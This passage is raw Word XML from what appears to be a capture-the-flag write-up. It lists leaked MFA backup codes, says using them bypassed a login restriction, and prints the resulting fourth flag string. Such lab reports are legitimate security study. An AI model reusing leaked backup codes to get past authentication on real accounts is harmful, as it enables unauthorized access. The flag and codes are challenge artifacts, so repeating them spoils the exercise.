          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backup codes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A462F80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RN69-FI51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9D615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QSOF-FGNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E3978A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RJ2B-BSZU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3C4F1E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KO3G-HDTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDE9D9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OP37-X1FV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983B688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EVPP-XBB7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214F31E9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Z9ZD-J004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD84E6">
      <w:pPr>
        <w:jc w:val="left"/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/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>92RE-6N96</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F4BE33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br w:type="textWrapping"/>
      </w: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11476990" cy="1296035"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065"/>
            <wp:docPr id="26" name="Picture 26" descr="VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_03_12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VirtualBox_kali-linux-2024.1-virtualbox-amd64_26_08_2025_03_12_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7699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9B88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3F472F0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A6F6A29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79E2A0E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1CD9DFEB">
      <w:pPr>
        <w:pStyle w:val="10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t xml:space="preserve">The leaked backup codes functioned as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>secondary authentication tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B029718">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0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b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using these bypassed the login restriction and revealed the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>4th flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF10BA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6BAA787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38B7C1F8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50D2824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0650605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4179A280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652D3B59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6522CF4B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BED961B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>Flag Obtained:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CloudSEK{Flag_4_T0k3n_3xp0s3d_JS_MFA_Byp4ss}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A35CCB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36814908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623A8DA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025515" cy="3023870"/>
            <wp:effectExtent l="0" t="0" r="6985" b="11430"/>
            <wp:docPr id="27" name="Picture 27" descr="Screenshot 2025-08-26 03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8-26 0316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864E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202E48B5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36CBCCB3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A82EE8D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40BCCEC">
      <w:pPr>
        <w:jc w:val="left"/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83DEC3F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11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                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">   Thank You!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C97A9F"/>
    <w:rsid w:val="6DC9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224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2025-08-25T18:15:00Z</dcterms:created>
  <dc:creator>kamal</dc:creator>
  <cp:lastModifiedBy>Rebel Raj</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-25T22:00:04Z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6BCA4535A62D4EAFB80925CCE37365F7_11</vt:lpwstr>
  </property>
</Properties>
</file>